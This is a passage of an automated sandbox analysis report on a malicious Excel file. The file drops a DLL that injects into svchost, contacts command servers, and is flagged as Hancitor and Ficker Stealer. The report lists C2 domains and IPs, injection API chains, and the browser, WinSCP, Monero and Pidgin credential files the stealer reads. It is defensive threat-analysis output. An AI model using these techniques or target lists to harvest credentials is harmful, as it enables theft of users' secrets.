                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0035201C SetUnhandledExceptionFilter,__encode_pointer,5_2_0035201C
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0034D00F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0034D00F
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0034B083 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0034B083
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0034CA9B __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0034CA9B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040115C SetUnhandledExceptionFilter,exit,7_2_0040115C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00401150 SetUnhandledExceptionFilter,7_2_00401150
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004013C9 SetUnhandledExceptionFilter,7_2_004013C9

                  HIPS / PFW / Operating System Protection Evasion:

                  barindex
                  System process connects to network (likely due to code injection or exploit)Show sources
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pospvisis.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 50.16.239.65 80Jump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 8.211.241.0 80Jump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeDomain query: tholeferli.com
                  Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 54.235.88.121 80Jump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 194.147.115.74 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: api.ipify.org
                  Source: C:\Windows\SysWOW64\rundll32.exeDomain query: s0lom0n.ru
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 95.213.179.67 80Jump to behavior
                  Contains functionality to inject threads in other processesShow sources
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00343880 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,VirtualAlloc,CreateThread,CloseHandle,5_2_00343880
                  Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNABJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exeJump to behavior
                  Source: rundll32.exe, 00000004.00000002.2348564592.0000000000720000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349126393.0000000000D30000.00000002.00000001.sdmpBinary or memory string: Program Manager
                  Source: rundll32.exe, 00000004.00000002.2348564592.0000000000720000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349126393.0000000000D30000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                  Source: rundll32.exe, 00000004.00000002.2348564592.0000000000720000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349126393.0000000000D30000.00000002.00000001.sdmpBinary or memory string: !Progman
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00356240 cpuid 5_2_00356240
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,5_2_00355E13
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: CreateMutexA,LoadLibraryA,URLDownloadToFileA,LoadLibraryA,GetComputerNameW,GetSystemInfo,GlobalMemoryStatusEx,GetTimeZoneInformation,GetLocaleInfoW,CreateToolhelp32Snapshot,Process32First,Process32Next,RegOpenKeyExW,RegEnumKeyExW,RegOpenKeyExW,7_2_00415800
                  Source: C:\Windows\SysWOW64\svchost.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Application Data VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0034BDA0 GetSystemTimeAsFileTime,__aulldiv,5_2_0034BDA0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0035073E __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,__invoke_watson,__invoke_watson,5_2_0035073E
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00341AA0 GetVersion,wsprintfA,wsprintfA,5_2_00341AA0
                  Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information:

                  barindex
                  Yara detected Ficker StealerShow sources
                  Source: Yara matchFile source: 00000007.00000002.2132921997.000000000022B000.00000004.00000020.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2292, type: MEMORY
                  Tries to harvest and steal Bitcoin Wallet informationShow sources
                  Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                  Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)Show sources
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\logins.jsonJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqliteJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                  Tries to steal Instant Messenger accounts or passwordsShow sources
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior

                  Remote Access Functionality:

                  barindex
                  Yara detected Ficker StealerShow sources
                  Source: Yara matchFile source: 00000007.00000002.2132921997.000000000022B000.00000004.00000020.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2292, type: MEMORY
                  Yara detected HancitorShow sources
                  Source: Yara matchFile source: 5.3.rundll32.exe.1d438c.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.3.rundll32.exe.1d438c.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.rundll32.exe.340000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000003.2121584965.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2364, type: MEMORY

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid AccountsScripting32DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1OS Credential Dumping1System Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer13Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsNative API3Boot or Logon Initialization ScriptsProcess Injection212Deobfuscate/Decode Files or Information1Credentials in Registry2File and Directory Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsExploitation for Client Execution33Logon Script (Windows)Logon Script (Windows)Scripting32Credentials In Files1System Information Discovery46SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSSecurity Software Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol123SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsVirtualization/Sandbox Evasion1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsProcess Discovery3VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading1DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion1Proc FilesystemSystem Network Configuration Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection212/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                  Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Rundll321Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 452590 Sample: 0722_2857746751.xls Startdate: 22/07/2021 Architecture: WINDOWS Score: 100 44 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->44 46 Multi AV Scanner detection for domain / URL 2->46 48 Found malware configuration 2->48 50 17 other signatures 2->50 8 EXCEL.EXE 12 34 2->8         started        process3 file4 24 C:\Users\user\AppData\Local\Temp\532.dll, PE32 8->24 dropped 60 Document exploit detected (creates forbidden files) 8->60 12 rundll32.exe 8->12         started        14 imjppdmg.exe 12 8->14         started        signatures5 process6 process7 16 rundll32.exe 9 12->16         started        dnsIp8 26 tholeferli.com 194.147.115.74, 49168, 49170, 49172 MIRHOSTINGRU unknown 16->26 28 s0lom0n.ru 8.211.241.0, 49169, 80 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 16->28 30 3 other IPs or domains 16->30 38 System process connects to network (likely due to code injection or exploit) 16->38 40 May check the online IP address of the machine 16->40 42 Contains functionality to inject threads in other processes 16->42 20 svchost.exe 12 16->20         started        signatures9 process10 dnsIp11 32 pospvisis.com 95.213.179.67, 49173, 49178, 80 SELECTELRU Russian Federation 20->32 34 50.16.239.65, 49171, 80 AMAZON-AESUS United States 20->34 36 3 other IPs or domains 20->36 52 System process connects to network (likely due to code injection or exploit) 20->52 54 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 20->54 56 May check the online IP address of the machine 20->56 58 3 other signatures 20->58 signatures12

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.